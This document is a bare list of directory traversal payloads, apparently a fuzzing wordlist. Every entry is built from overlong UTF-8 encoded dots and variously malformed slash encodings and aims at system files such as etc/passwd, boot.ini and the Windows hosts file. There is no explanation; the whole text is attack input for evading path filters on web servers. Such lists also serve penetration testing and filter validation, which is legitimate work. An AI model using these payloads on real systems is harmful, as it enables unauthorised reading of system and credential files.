-%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pcetc%c1%pcissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pcboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pc%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9vetc%c0%9vpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9vetc%c0%9vissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9vboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9vetc%c0%9vpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9vetc%c0%9vissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9vboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9vetc%c0%9vpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9vetc%c0%9vissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9vboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9vetc%c0%9vpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9vetc%c0%9vissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9vboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9vetc%c0%9vpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9vetc%c0%9vissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9vboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9vetc%c0%9vpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9vetc%c0%9vissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9vboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9v%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qfetc%c0%qfpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qfetc%c0%qfissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qfboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qfetc%c0%qfpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qfetc%c0%qfissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qfboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qfetc%c0%qfpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qfetc%c0%qfissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qfboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qfetc%c0%qfpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qfetc%c0%qfissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qfboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qfetc%c0%qfpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qfetc%c0%qfissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qfboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qfetc%c0%qfpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qfetc%c0%qfissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qfboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8setc%c1%8spasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8setc%c1%8sissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8sboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8setc%c1%8spasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8setc%c1%8sissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8sboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8setc%c1%8spasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8setc%c1%8sissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8sboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8setc%c1%8spasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8setc%c1%8sissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8sboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8setc%c1%8spasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8setc%c1%8sissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8sboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8setc%c1%8spasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8setc%c1%8sissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8sboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8s%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1cetc%c1%1cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1cetc%c1%1cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1cetc%c1%1cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1cetc%c1%1cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1cetc%c1%1cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1cetc%c1%1cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1cetc%c1%1cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1cetc%c1%1cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1cetc%c1%1cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1cetc%c1%1cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1cetc%c1%1cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1cetc%c1%1cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%afetc%c1%afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%afetc%c1%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%afetc%c1%afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%afetc%c1%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%afetc%c1%afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%afetc%c1%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c1%afetc%c1%afpasswd 